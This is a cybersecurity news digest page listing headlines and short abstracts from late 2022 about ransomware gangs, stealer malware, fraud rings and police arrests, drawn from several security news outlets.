
Cuba Ransomware Extorted Over $60 Million in Ransom Fees from More than 100 Entities Full Text

Abstract The threat actors behind Cuba (aka COLDDRAW) ransomware have received more than $60 million in ransom payments and compromised over 100 entities across the world as of August 2022. In a new advisory shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), the agencies highlighted a "sharp increase in both the number of compromised U.S. entities and the ransom amounts." The ransomware crew, also known as Tropical Scorpius, has been observed targeting financial services, government facilities, healthcare, critical manufacturing, and IT sectors, while simultaneously expanding its tactics to gain initial access and interact with breached networks. It's worth noting that despite the name "Cuba," there is no evidence to suggest that the actors have any connection or affiliation with the island country. The entry point for the attacks involves the exploitation of known security flaws, phishing,

The Hacker News


December 1, 2022

New Exploit Broker on the Scene Pays Premium for Signal App Zero-Days Full Text

Abstract Russia-based OpZero went on the record recently with a $1.5 million offer for Signal remote code execution (RCE) exploits, more than tripling the relatively stable high-water mark for that app offered by American firm Zerodium.

Dark Reading


November 29, 2022

Spanish police dismantle operation that made €12M via investment scams Full Text

Abstract Spanish National Police have dismantled a cybercrime organization that used fake investment sites to defraud over €12.3 million ($12.8 million) from 300 victims across Europe.

BleepingComputer


November 29, 2022

North Carolina College Confirms Ransomware Group Stole Sensitive Data Full Text

Abstract A spokesperson for the college said the attack occurred in October and law enforcement was immediately notified. The school disconnected its systems and hired outside security experts to help restore systems and investigate the incident.

The Record


November 26, 2022

Ransomware gang targets Belgian municipality, hits police instead Full Text

Abstract The Ragnar Locker ransomware gang has published stolen data from what they thought was the municipality of Zwijndrecht, but turned out to be stolen from Zwijndrecht police, a local police unit in Antwerp, Belgium.

BleepingComputer


November 25, 2022

An international police operation dismantled the spoofing service iSpoof Full Text

Abstract An international law enforcement operation has dismantled an online phone number spoofing service called iSpoof. An international law enforcement operation that was conducted by authorities in Europe, Australia, the United States, Ukraine, and Canada,...

Security Affairs


November 25, 2022

U.K. Police Arrest 142 in Global Crackdown on ‘iSpoof’ Phone Spoofing Service Full Text

Abstract A coordinated law enforcement effort has dismantled an online phone number spoofing service called iSpoof and arrested 142 individuals linked to the operation. The websites, ispoof[.]me and ispoof[.]cc, allowed the crooks to "impersonate trusted corporations or contacts to access sensitive information from victims," Europol said in a press statement. Worldwide losses exceeded €115 million ($119.8 million), with over 200,000 potential victims believed to have been directly targeted through iSpoof in the U.K. alone, the Metropolitan Police noted. Among the 142 people arrested is the administrator of the website, who was apprehended in the U.K. on November 6, 2022. The website and its server were subsequently seized and taken offline two days later by Ukrainian and U.S. agencies. Per the National Police Corps, the helpdesk fraud allowed registered subscribers on the online portal to mask their phone numbers and make calls impersonating banks, retail companies, an

The Hacker News


November 25, 2022

Interpol Seized $130 Million from Cybercriminals in Global “HAECHI-III” Crackdown Operation Full Text

Abstract Interpol on Thursday announced the seizure of $130 million worth of virtual assets in connection with a global crackdown on cyber-enabled financial crimes and money laundering. The international police operation, dubbed HAECHI-III, transpired between June 28 and November 23, 2022, resulting in the arrests of 975 individuals and the closure of more than 1,600 cases. This comprised two fugitives wanted by South Korea for their supposed involvement in a Ponzi scheme to embezzle €28 million from 2,000 victims. Another instance pertained to a call center scam based out of India, wherein a group of criminals impersonated Interpol and Europol officers to trick victims in Austria into transferring funds. The call centers operated from New Delhi and Noida. The illegal activity informed the victims that their "identities were stolen and crime pertaining to narcotics drugs were committed in their names," forcing them to make a money transfer. "In order to clear themselve

The Hacker News


November 24, 2022

Interpol seized $130 million from cybercriminals worldwide Full Text

Abstract INTERPOL has announced the seizure of $130 million worth of money and virtual assets linked to various cybercrimes and money laundering operations.

BleepingComputer


November 24, 2022

U.S. govt seizes domains used in ‘pig butchering’ scams Full Text

Abstract For the first time, the U.S. Department of Justice seized seven domains that hosted websites linked to "pig butchering" scams, where fraudsters trick victims of romance scams into investing in cryptocurrency via fake investment platforms.

BleepingComputer


November 24, 2022

‘iSpoof’ service dismantled, main operator and 145 users arrested Full Text

Abstract The 'iSpoof' online spoofing service has been dismantled following an international law enforcement investigation that also led to the arrest of 146 people, including the suspected mastermind of the operation.

BleepingComputer


November 24, 2022

Black Basta Ransomware Gang Actively Infiltrating U.S. Companies with Qakbot Malware Full Text

Abstract Companies based in the U.S. have been at the receiving end of an "aggressive" Qakbot malware campaign that leads to Black Basta ransomware infections on compromised networks. "In this latest campaign, the Black Basta ransomware gang is using QakBot malware to create an initial point of entry and move laterally within an organization's network," Cybereason researchers Joakim Kandefelt and Danielle Frankel said in a report shared with The Hacker News. Black Basta, which emerged in April 2022, follows the tried-and-tested approach of double extortion to steal sensitive data from targeted companies and use it as leverage to extort cryptocurrency payments by threatening to release the stolen information. This is not the first time the ransomware crew has been observed using Qakbot (aka QBot, QuackBot, or Pinkslipbot). Last month, Trend Micro disclosed similar attacks that entailed the use of Qakbot to deliver the Brute Ratel C4 framework, which, in turn, w

The Hacker News


November 23, 2022

34 Russian Cybercrime Groups Stole Over 50 Million Passwords with Stealer Malware Full Text

Abstract As many as 34 Russian-speaking gangs distributing information-stealing malware under the stealer-as-a-service model stole no fewer than 50 million passwords in the first seven months of 2022. "The underground market value of stolen logs and compromised card details is estimated around $5.8 million," Singapore-headquartered Group-IB said in a report shared with The Hacker News. Aside from looting passwords, the stealers also harvested 2.11 billion cookie files, 113,204 crypto wallets, and 103,150 payment cards. A majority of the victims are located in the U.S., followed by Brazil, India, Germany, Indonesia, the Philippines, France, Turkey, Vietnam, and Italy. In total, 890,000 devices in 111 countries were infected during the time frame. Group-IB said the members of several scam groups who are propagating the information stealers previously participated in the Classiscam operation. These groups, which are active on Telegram and have around 200 members on average, a

The Hacker News


November 23, 2022

Exclusive – Quantum Locker lands in the Cloud Full Text

Abstract The gang behind Quantum Locker used a particular modus operandi to target large enterprises relying on cloud services in the NACE region. Executive Summary Quantum Locker gang demonstrated capabilities to operate ransomware extortion even on cloud...

Security Affairs


November 23, 2022

Russian cybergangs stole over 50 million passwords this year Full Text

Abstract At least 34 distinct Russian-speaking cybercrime groups using info-stealing malware like Raccoon and Redline have collectively stolen 50,350,000 account passwords from over 896,000 individual infections from January to July 2022.

BleepingComputer


November 22, 2022

Donut extortion group also targets victims with ransomware Full Text

Abstract The Donut (D0nut) extortion group has been confirmed to deploy ransomware in double-extortion attacks on the enterprise.

BleepingComputer


November 22, 2022

Researchers Warn of Cyber Criminals Using Go-based Aurora Stealer Malware Full Text

Abstract A nascent Go-based malware known as Aurora Stealer is being increasingly deployed as part of campaigns designed to steal sensitive information from compromised hosts. "These infection chains leveraged phishing pages impersonating download pages of legitimate software, including cryptocurrency wallets or remote access tools, and the 911 method making use of YouTube videos and SEO-poisoned fake cracked software download websites," cybersecurity firm SEKOIA said. First advertised on Russian cybercrime forums in April 2022, Aurora was offered as a commodity malware for other threat actors, describing it as a "multi-purpose botnet with stealing, downloading and remote access capabilities." In the intervening months, the malware has been scaled down to a stealer that can harvest files of interest, data from 40 cryptocurrency wallets, and applications like Telegram. Aurora also comes with a loader that can deploy a next-stage payload using a PowerShell command.

The Hacker News


November 22, 2022

Vietnam-Based Ducktail Cybercrime Operation Evolving, Expanding Full Text

Abstract The Ducktail information stealer has been updated with new capabilities and the threat actors that use it have been expanding their operation, according to WithSecure, formerly known as F-Secure Business.

Security Week


November 22, 2022

Luna Moth Gang Invests in Call Centers to Target Businesses with Callback Phishing Campaigns Full Text

Abstract The Luna Moth campaign has extorted hundreds of thousands of dollars from several victims in the legal and retail sectors. The attacks are notable for employing a technique called callback phishing or telephone-oriented attack delivery (TOAD), wherein the victims are socially engineered into making a phone call through phishing emails containing invoices and subscription-themed lures. Palo Alto Networks Unit 42 said the attacks are the "product of a single highly organized campaign," adding, "this threat actor has significantly invested in call centers and infrastructure that's unique to each victim." The cybersecurity firm described the activity as a "pervasive multi-month campaign that is actively evolving." What's notable about callback phishing is that the email messages are completely devoid of any malicious attachment or booby-trapped link, allowing them to evade detection and slip past email protection solutions. These messages ty

The Hacker News


November 22, 2022

Two Estonian citizens arrested in $575M cryptocurrency fraud scheme Full Text

Abstract Two Estonian citizens were arrested in Tallinn for allegedly running a $575 million cryptocurrency fraud scheme. Two Estonian nationals were arrested in Tallinn, Estonia, after being indicted in the US for running a fraudulent cryptocurrency Ponzi...

Security Affairs


November 21, 2022

Two Estonians arrested for running $575M crypto Ponzi scheme Full Text

Abstract Two Estonian nationals were arrested in Tallinn, Estonia, on Sunday after being indicted in the U.S. for running a massive cryptocurrency Ponzi scheme that led to losses of more than $575 million.

BleepingComputer


November 21, 2022

Daixin Ransomware Gang Steals 5 Million AirAsia Passengers’ and Employees’ Data Full Text

Abstract The cybercrime group called Daixin Team has leaked sample data belonging to AirAsia, a Malaysian low-cost airline, on its data leak portal. The development comes a little over a week after the company fell victim to a ransomware attack on November 11 and 12, per DataBreaches.net. The threat actors allegedly claim to have obtained the personal data associated with five million unique passengers and all of its employees. The samples uploaded to the leak site reveal passenger information and the booking IDs as well as personal data related to the company's staff. A spokesperson for the threat actor told DataBreaches.net that further attacks were not pursued owing to AirAsia's poor security measures and "the chaotic organization of the network." Daixin Team was recently the subject of an advisory from the U.S. cybersecurity and intelligence agencies, which warned of attacks mainly aimed at the healthcare sector. Other victims of the criminal group include Fi

The Hacker News


November 21, 2022

Hackers steal $300,000 in DraftKings credential stuffing attack Full Text

Abstract Sports betting company DraftKings said today that it would make whole customers affected by a credential stuffing attack that led to losses of up to $300,000.

BleepingComputer


November 19, 2022

Hive ransomware crooks extort $100m from 1,300 global orgs Full Text

Abstract In a joint advisory with CISA and HHS, the FBI this week detailed Hive indicators of compromise and commonly used techniques and procedures that the Feds have observed as recently as this month.

The Register


November 18, 2022

Hive Ransomware Attackers Extorted $100 Million from Over 1,300 Companies Worldwide Full Text

Abstract The threat actors behind the Hive ransomware-as-a-service (RaaS) scheme have launched attacks against over 1,300 companies across the world, netting the gang $100 million in illicit payments as of November 2022. "Hive ransomware has targeted a wide range of businesses and critical infrastructure sectors, including government facilities, communications, critical manufacturing, information technology, and — especially — Healthcare and Public Health (HPH)," U.S. cybersecurity and intelligence authorities said in an alert. Active since June 2021, Hive's RaaS operation involves a mix of developers, who create and manage the malware, and affiliates, who are responsible for conducting the attacks on target networks by often purchasing initial access from initial access brokers (IABs). In most cases, gaining a foothold involves the exploitation of ProxyShell flaws in Microsoft Exchange Server, followed by taking steps to terminate processes associated with antivirus engi

The Hacker News


November 17, 2022

FBI-Wanted Leader of the Notorious Zeus Botnet Gang Arrested in Geneva Full Text

Abstract A Ukrainian national who has been wanted by the U.S. for over a decade has been arrested by Swiss authorities for his role in a notorious cybercriminal ring that stole millions of dollars from victims' bank accounts using malware called Zeus. Vyacheslav Igorevich Penchukov, who went by online pseudonyms "tank" and "father," is said to have been involved in the day-to-day operations of the group. He was apprehended on October 23, 2022, and is pending extradition to the U.S. Details of the arrest were first reported by independent security journalist Brian Krebs. Penchukov, along with Ivan Viktorovich Klepikov (aka "petrovich" and "nowhere") and Alexey Dmitrievich Bron (aka "thehead"), was first charged in the District of Nebraska in August 2012. According to court documents released by the U.S. Department of Justice (DoJ) in 2014, Penchukov and eight other members of the cybercriminal group infected "thousands of busin

The Hacker News


November 17, 2022

Tank, the leader of the Zeus cybercrime gang, was arrested by the Swiss police Full Text

Abstract A suspected leader of the Zeus cybercrime gang, Vyacheslav Igorevich Penchukov (aka Tank), was arrested by Swiss police. Swiss police last month arrested in Geneva Vyacheslav Igorevich Penchukov (40), also known as Tank, who is one of the leaders...

Security Affairs


November 16, 2022

Suspected Zeus cybercrime ring leader ‘Tank’ arrested by Swiss police Full Text

Abstract Vyacheslav Igorevich Penchukov, also known as Tank and one of the leaders of the notorious JabberZeus cybercrime gang, was arrested in Geneva last month.

BleepingComputer


November 15, 2022

Avast details Worok espionage group’s compromise chain Full Text

Abstract Cyber espionage group Worok abuses the Dropbox API to exfiltrate data using a backdoor hidden in apparently innocuous image files. Researchers from cybersecurity firm Avast observed the recently discovered espionage group Worok abusing the Dropbox API to exfiltrate...

Security Affairs


November 14, 2022

Ransomware gangs shift tactics, making crimes harder to track Full Text

Abstract Ransomware gangs increasingly use their own or stolen computer code, moving away from a ransomware-as-a-service model that made their activities easier to monitor, new research shows.

LA Times


November 13, 2022

Ukraine Police dismantled a transnational fraud group that made €200 million per year Full Text

Abstract Ukraine's Cyber Police and Europol arrested 5 Ukrainian citizens who are members of a large-scale transnational fraud group. Ukraine's cyber police and Europol arrested five members of a transnational fraud group that caused more than 200 million...

Security Affairs


November 13, 2022

Lockbit gang leaked data stolen from global high-tech giant Thales Full Text

Abstract The Lockbit 3.0 ransomware gang started leaking the information allegedly stolen from the global high-tech company Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide. The Group invests in digital and deep tech innovations...

Security Affairs


November 12, 2022

Russian Hackers Are Publishing Stolen Abortion Records on the Dark Web Full Text

Abstract Hackers who stole a trove of data from one of Australia’s biggest private health insurers are drip-feeding sensitive details of customers' medical diagnoses and procedures, including abortions, onto the dark web.

Vice


November 11, 2022

U.S. seized 18 web domains used for recruiting money mules Full Text

Abstract The FBI and U.S. Postal Inspection Service have seized eighteen web domains used to recruit money mules for work-from-home and reshipping scams.

BleepingComputer


November 11, 2022

‘We know who you are’: Australian police say Russian cybercriminals behind Medibank hack Full Text

Abstract The Australian federal police say hackers in Russia are responsible for the Medibank data breach, with the commissioner stating “we know who you are”. Reece Kershaw said on Friday that the AFP had identified the hackers while working with Interpol.

The Guardian


November 10, 2022

Update: Ransomware Gang Offers to Sell Files Stolen From Continental for $50 Million Full Text

Abstract Continental reported in August that it had been targeted in a cyberattack that resulted in hackers accessing some of its systems. The company said at the time that the attack had been “averted” and that business activities were not affected.

Security Week


November 10, 2022

Ukraine arrests fraud ring members who made €200 million per year Full Text

Abstract Ukraine's cyber police and Europol have identified and arrested five key members of an international investment fraud ring estimated to have caused losses of over €200 million per year.

BleepingComputer


November 10, 2022

Russian LockBit ransomware operator arrested in Canada Full Text

Abstract Europol has announced today the arrest of a Russian national linked to LockBit ransomware attacks targeting critical infrastructure organizations and high-profile companies worldwide.

BleepingComputer


November 8, 2022

US DoJ seizes $3.36B Bitcoin from Silk Road hacker Full Text

Abstract The U.S. Department of Justice convicted James Zhong, a hacker who stole 50,000 bitcoins from the Silk Road dark net marketplace. The US Department of Justice announced that a man from Georgia, James Zhong, has pleaded guilty to wire fraud after stealing...

Security Affairs


November 07, 2022

U.S. unmasks hacker who stole 50,000 bitcoins from Silk Road Full Text

Abstract The U.S. Department of Justice has announced today the conviction of James Zhong, a mysterious hacker who stole 50,000 bitcoins from the 'Silk Road' dark net marketplace.

BleepingComputer


November 07, 2022

Ransomware gang threatens to release stolen Medibank data Full Text

Abstract A ransomware gang that some believe is a relaunch of REvil and others track as BlogXX has claimed responsibility for last month's ransomware attack against Australian health insurance provider Medibank Private Limited.

BleepingComputer


November 6, 2022

LockBit 3.0 gang claims to have stolen data from Kearney & Company Full Text

Abstract The ransomware group LockBit claimed to have stolen data from consulting and IT services provider Kearney & Company. Kearney is a leading CPA firm that provides services across the financial management spectrum to government entities. The company provides...

Security Affairs


November 3, 2022

LockBit ransomware gang claims the hack of Continental automotive group Full Text

Abstract The LockBit ransomware group claimed to have hacked the multinational automotive group Continental and threatens to leak stolen data. The LockBit ransomware gang announced that it had hacked the German multinational automotive parts manufacturing...

Security Affairs


November 03, 2022

New Crimson Kingsnake gang impersonates law firms in BEC attacks Full Text

Abstract A business email compromise (BEC) group named 'Crimson Kingsnake' has emerged, impersonating well-known international law firms to trick recipients into approving overdue invoice payments.

BleepingComputer


November 3, 2022

Experts link the Black Basta ransomware operation to FIN7 cybercrime gang Full Text

Abstract Sentinel Labs found evidence that links the Black Basta ransomware gang to the financially motivated hacking group FIN7. Security researchers at Sentinel Labs shared details about Black Basta's TTPs and assess it is highly likely the ransomware operation...

Security Affairs


November 03, 2022

OPERA1ER hackers steal over $11 million from banks and telcos Full Text

Abstract A threat group that researchers call OPERA1ER has stolen at least $11 million from banks and telecommunication service providers in Africa using off-the-shelf hacking tools.

BleepingComputer


November 03, 2022

Black Basta ransomware gang linked to the FIN7 hacking group Full Text

Abstract Security researchers at Sentinel Labs have uncovered evidence that links the Black Basta ransomware gang to the financially motivated hacking group FIN7, also known as "Carbanak."

BleepingComputer


November 1, 2022

LockBit 3.0 gang claims to have stolen data from Thales Full Text

Abstract The ransomware group LockBit 3.0 claimed to have stolen data from the French defence and technology group Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide. The Group invests in digital and deep tech innovations...

Security Affairs


October 30, 2022

German BKA arrested the alleged operator of Deutschland im Deep Web darknet market Full Text

Abstract German police arrested a student who is suspected of being the administrator of the 'Deutschland im Deep Web' (DiDW) darknet marketplace. Germany's Federal Criminal Police Office (BKA) has arrested a student (22) in Bavaria, who is suspected of being...

Security Affairs


October 28, 2022

Student arrested for running one of Germany’s largest dark web markets Full Text

Abstract The Federal Criminal Police Office (BKA) in Germany has arrested a 22-year-old student in Bavaria, who is suspected of being the administrator of 'Deutschland im Deep Web' (DiDW) 3, one of the largest darknet markets in the country.

BleepingComputer


October 28, 2022

Raspberry Robin Operators Selling Cybercriminals Access to Thousands of Endpoints Full Text

Abstract The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID, Bumblebee, TrueBot (aka Silence), and Clop ransomware. It is "part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread," the Microsoft Security Threat Intelligence Center (MSTIC) said in a detailed write-up. Raspberry Robin, also called QNAP Worm owing to the use of compromised QNAP storage servers for command-and-control, is the name given to a malware by cybersecurity company Red Canary that spreads to Windows systems through infected USB drives. MSTIC is keeping tabs on the activity group behind the USB-based Raspberry Robin infections as DEV-0856, adding it's aware of at least four confirmed entry points that all have the likely end goal of deploying ransomware. The tech giant's cybersecurity team said that Raspberry Robin has

The Hacker News


October 27, 2022

Raspberry Robin operators are selling initial access to compromised enterprise networks to ransomware gangs Full Text

Abstract DEV-0950 group used Clop ransomware to encrypt the network of organizations previously infected with the Raspberry Robin worm. Microsoft has discovered recent activity that links the Raspberry Robin worm to human-operated ransomware attacks.  Data...

Security Affairs


October 27, 2022

British hacker arraigned for running The Real Deal dark web marketplace Full Text

Abstract A popular British hacker was charged by the U.S. authorities for allegedly running the 'The Real Deal' dark web marketplace. The British hacker Daniel Kaye (aka Bestbuy, Spdrman, Popopret, UserL0ser) (34) was charged by the U.S. DoJ for allegedly...

Security Affairs


October 25, 2022

Hive ransomware gang starts leaking data allegedly stolen from Tata Power Full Text

Abstract The Hive ransomware gang, which claimed responsibility for the Tata Power data breach, started leaking data. On October 14, Tata Power, India's largest power generation company, announced that it was hit by a cyber attack. Threat actors hit the Information...

Security Affairs


October 25, 2022

Dutch police arrest hacker who breached healthcare software vendor Full Text

Abstract The Dutch police have arrested a 19-year-old man in western Netherlands, suspected of breaching the systems of a healthcare software vendor in the country, and stealing tens of thousands of documents.

BleepingComputer


October 25, 2022

Crooks Use Two Different POS Malware to Steal 167,000 Credit Card Numbers Full Text

Abstract The MajikPOS and Treasure Hunter malware infect Windows POS terminals and scan the devices to exploit the moments when card data is read and stored in plain text in memory.

The Register


October 25, 2022

Cybercriminals Used Two PoS Malware to Steal Details of Over 167,000 Credit Cards Full Text

Abstract Two point-of-sale (PoS) malware variants have been put to use by a threat actor to steal information related to more than 167,000 credit cards from payment terminals. According to Singapore-headquartered cybersecurity company Group-IB, the stolen data dumps could net the operators as much as $3.34 million by selling them on underground forums. While a significant proportion of attacks aimed at gathering payment data rely on JavaScript sniffers (aka web skimmers) stealthily inserted on e-commerce websites, PoS malware continues to be an ongoing, if less popular, threat. Just last month, Kaspersky detailed new tactics adopted by a Brazilian threat actor known as Prilex to steal money by means of fraudulent transactions. "Almost all PoS malware strains have a similar card dump extraction functionality, but different methods for maintaining persistence on infected devices, data exfiltration and processing," researchers Nikolay Shelekhov and Said Khamchiev said. Trea

The Hacker News


October 22, 2022

Remote Control Tools Popular Among Cybercriminals Full Text

Abstract While remote access tools offer flexible support to organizations, these tools are increasingly abused by cybercriminals against target organizations. Remote shells are the most common remote access tool, followed by RATs, Cobalt Strike, and others.

Cyware Alerts - Hacker News


October 20, 2022

Brazilian police arrested a man suspected of being a member of LAPSUS$ gang Full Text

Abstract The Federal Police of Brazil arrested an individual who is suspected of being a member of the notorious LAPSUS$ extortionist group. The Federal Police of Brazil yesterday announced the arrest of an individual suspected of being linked to the LAPSUS$...

Security Affairs


October 20, 2022

Cybercriminals jailed for cryptocurrency theft, death threats Full Text

Abstract On Wednesday, two Massachusetts men were sentenced to more than two years in prison each for stealing cryptocurrency in SIM swapping attacks and hijacking their victims' social media accounts.

BleepingComputer


October 20, 2022

Brazilian Police Arrest Suspected Member of Lapsus$ Hacking Group Full Text

Abstract The Federal Police of Brazil on Wednesday announced it had arrested an individual for purported links to the notorious LAPSUS$ extortionist gang. The arrest was made as part of a new law enforcement effort, dubbed Operation Dark Cloud, that was launched in August 2022, the agency noted. Not much is known about the suspect other than the fact that the person could be a teenager. The Polícia Federal said it commenced its investigation in December 2021 following an attack on websites under Brazil's Ministry of Health, resulting in the alleged exfiltration of 50TB of data and temporary unavailability of COVID-19 vaccination data of millions of citizens. Other federal government portals targeted by the LAPSUS$ group in Brazil include the Ministry of Economy, Comptroller General of the Union, and the Federal Highway Police. "The crimes determined in the police investigation are those of criminal organization, invasion of a computer device, interruption or disturbance of te

The Hacker News


October 19, 2022

Brazil arrests suspect linked to the Lapsus$ hacking group Full Text

Abstract Today, the Brazilian Federal Police arrested a Brazilian suspect in the city of Feira de Santana, Bahia, believed to be part of the Lapsus$ extortion gang.

BleepingComputer


October 19, 2022

The missed link between Ransom Cartel and REvil ransomware gangs Full Text

Abstract Researchers at Palo Alto Networks' Unit 42 linked the Ransom Cartel ransomware operation to the REvil ransomware operations. Researchers at Palo Alto Networks' Unit 42 have linked the relatively new Ransom Cartel ransomware operation with the notorious...

Security Affairs


October 18, 2022

Ransom Cartel linked to notorious REvil ransomware operation Full Text

Abstract Threat analysts have connected the pieces that link the Ransom Cartel RaaS (ransomware-as-a-service) to the REvil gang, one of the most notorious and prolific ransomware groups in recent years.

BleepingComputer


October 18, 2022

Law enforcement arrested 31 suspects for stealing cars by hacking key fobs Full Text

Abstract An international law enforcement operation led by Europol disrupted a cybercrime ring focused on hacking wireless key fobs to steal cars. The French authorities in cooperation with their Spanish and Latvian peers, and with the support of Europol and Eurojust,...

Security Affairs


October 18, 2022

European Police Arrest a Gang That Hacked Wireless Key Fobs to Steal Cars Full Text

Abstract Law enforcement authorities in France, in collaboration with Spain and Latvia, have disrupted a cybercrime ring that leveraged a hacking tool to steal cars without having to use a physical key fob. "The criminals targeted vehicles with keyless entry and start systems, exploiting the technology to get into the car and drive away," Europol said in a press statement. The coordinated operation, which took place on October 10, 2022, resulted in the arrest of 31 suspects from across 22 locations in the three nations, including software developers, its resellers, and the car thieves who used the tool to break into vehicles. Also confiscated by the officials as part of the arrests were criminal assets worth €1,098,500, not to mention an internet domain that allegedly advertised the service online. Per Europol, the criminals are said to have singled out keyless vehicles from two unnamed French car manufacturers. The perpetrators then used the fraudulent package to replace the

The Hacker News


October 17, 2022

Police dismantles criminal ring that hacked keyless cars Full Text

Abstract Authorities from France, Latvia, and Spain arrested 31 suspects believed to be part of a car theft ring that targeted vehicles from two French car manufacturers.

BleepingComputer


October 17, 2022

Interpol arrested 75 members of the cybercrime ring Black Axe Full Text

Abstract Interpol has announced the arrests of 75 individuals as part of a coordinated international operation against an organized cybercrime ring called Black Axe. Interpol arrested 75 individuals as part of a coordinated global operation, codenamed Operation...

Security Affairs


October 17, 2022

INTERPOL-led Operation Takes Down ‘Black Axe’ Cyber Crime Organization Full Text

Abstract The International Criminal Police Organization, also called Interpol, has announced the arrests of 75 individuals as part of a coordinated global operation against an organized cyber crime syndicate called Black Axe. "'Black Axe' and other West African organized crime groups have developed transnational networks, defrauding victims of millions while channeling their profits into lavish lifestyles and other criminal activities, from drug trafficking to sexual exploitation," the agency said. The law enforcement effort, codenamed Operation Jackal, involved the participation of Argentina, Australia, Côte d'Ivoire, France, Germany, Ireland, Italy, Malaysia, Nigeria, Spain, South Africa, the U.A.E, the U.K., and the U.S. Two of the alleged online scammers, who were arrested late last month in South Africa, are believed to have orchestrated a variety of fraudulent schemes that netted them $1.8 million from victims. The probe further led to 49 property searc

The Hacker News


October 14, 2022

Police tricks DeadBolt ransomware out of 155 decryption keys Full Text

Abstract The Dutch National Police, in collaboration with cybersecurity firm Responders.NU, tricked the DeadBolt ransomware gang into handing over 155 decryption keys by faking ransom payments.

BleepingComputer


October 14, 2022

INTERPOL arrests ‘Black Axe’ cybercrime syndicate members Full Text

Abstract INTERPOL has arrested over 70 suspected members of the 'Black Axe' cybercrime syndicate, with two believed to be responsible for $1.8 million in financial fraud.

BleepingComputer


October 13, 2022

Celsius Exchange Data Dump Is a Gift to Crypto Sleuths—and Thieves Full Text

Abstract Last week, Celsius, a cryptocurrency exchange facing bankruptcy, leaked an enormous collection of its users' transaction data through an unusual sort of privacy breach: a court filing.

Wired


October 12, 2022

Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike Full Text

Abstract Brute Ratel is a commercial (paid) Adversary Emulation framework and a relative newcomer to the commercial C&C Framework space, where it competes with more established players such as Cobalt Strike.

Trend Micro


October 11, 2022

DeepFakes Are The Cybercriminal Economy’s Latest Business Line Full Text

Abstract California-based Resecurity has identified a new spike of underground services enabling bad actors to generate deepfakes. According to cybersecurity experts, this may be used for political propaganda, foreign influence activity, disinformation, scams,...

Security Affairs


October 10, 2022

Egypt Leaks (EG) Group Spills Financial Information from Egyptian Banks Full Text

Abstract New cybercriminal group Egypt Leaks has been targeting Egyptian financial institutions and leaking huge volumes of compromised payment data from major Egyptian banks on the dark web. The activity was first spotted in a Telegram channel created to leak Excel files carrying details of 12,229 cre ...

Cyware Alerts - Hacker News


October 10, 2022

Hackers Steal $100 Million Cryptocurrency from Binance Bridge Full Text

Abstract BNB Chain, a blockchain linked to the Binance cryptocurrency exchange, disclosed an exploit on a cross-chain bridge that drained around $100 million in digital assets. "There was an exploit affecting the native cross-chain bridge between BNB Beacon Chain (BEP2) and BNB Smart Chain (BEP20 or BSC), known as 'BSC Token Hub,'" it said last week. "The exploit was through a sophisticated forging of the low level proof into one common library." According to Binance CEO Changpeng Zhao, the exploit on the cross-chain bridge "resulted in extra BNB," prompting a temporary suspension of the Binance Smart Chain (BSC). "BNB, which stands for 'Build and Build' (formerly called Binance Coin), is the blockchain gas token that 'fuels' transactions on BNB Chain," Binance noted earlier this February. No user funds are said to have been impacted, since the vulnerability in the BSC Token Hub bridge enabled the unknown threat actor

The Hacker News


October 09, 2022

Darkweb market BidenCash gives away 1.2 million credit cards for free Full Text

Abstract A dark web carding market named 'BidenCash' has released a massive dump of 1,221,551 credit cards to promote their marketplace, allowing anyone to download them for free to conduct financial fraud.

BleepingComputer


October 9, 2022

Everest gang demands $200K for data stolen from South Africa state-owned electricity company ESKOM Full Text

Abstract Everest ransomware operators claimed to have hacked South Africa state-owned company ESKOM Hld SOC Ltd. In March 2022, the Everest ransomware operators published a notice announcing the sale of "South Africa Electricity company's root access" for $125,000....

Security Affairs


October 8, 2022

LilithBot Malware and Eternity Project’s Cybercrime Operation Full Text

Abstract The multi-function malware is being constantly developed by its operators who have added anti-VM checks and anti-debugging features too. LilithBot can steal cookies, screenshots, pictures, and browser history from infected systems.

Cyware Alerts - Hacker News


October 06, 2022

Hacker steals $566 million worth of crypto from Binance Bridge Full Text

Abstract Hackers have reportedly stolen 2 million Binance Coins (BNB), worth $566 million, from the Binance Bridge.

BleepingComputer


October 06, 2022

Eternity Group Hackers Offering New LilithBot Malware as a Service to Cybercriminals Full Text

Abstract The threat actor behind the malware-as-a-service (MaaS) called Eternity has been linked to a new piece of malware called LilithBot. "It has advanced capabilities to be used as a miner, stealer, and a clipper along with its persistence mechanisms," Zscaler ThreatLabz researchers Shatak Jain and Aditya Sharma said in a Wednesday report. "The group has been continuously enhancing the malware, adding improvements such as anti-debug and anti-VM checks." Eternity Project came on the scene earlier this year, advertising its warez and product updates on a Telegram channel. The services provided include a stealer, miner, clipper, ransomware, USB worm, and a DDoS bot. LilithBot is the latest addition to this list. Like its counterparts, the multifunctional malware bot is sold on a subscription basis to other cybercriminals in return for a cryptocurrency payment. Upon a successful compromise, the information gathered through the bot – browser history, cookies, pictu

The Hacker News


October 06, 2022

19-Year-Old Teen Arrested for Using Leaked Optus Breach Data in SMS Scam Full Text

Abstract The Australian Federal Police (AFP) has arrested a 19-year-old teen from Sydney for allegedly attempting to leverage the data leaked following the Optus data breach late last month to extort victims. The suspect is said to have carried out a text message blackmail scam, demanding that the recipients transfer $2,000 to a bank account or risk getting their personal information misused for fraudulent activities. The source of the data, the agency said, was a sample database of 10,200 records that was posted briefly on a cybercrime forum accessible on the clearnet by an actor named "optusdata," before taking it down. Details of the scam were previously shared by 9News Australia reporter Chris O'Keefe on September 27, 2022. The AFP further said it executed a search warrant at the home of the offender, leading to the seizure of a mobile phone used to send the text messages to about 93 Optus customers. "At this stage it appears none of the individuals who received t

The Hacker News


October 04, 2022

Russian Hacker Arrested in India for Reportedly Helping Students Cheat in JEE-Main Exam Full Text

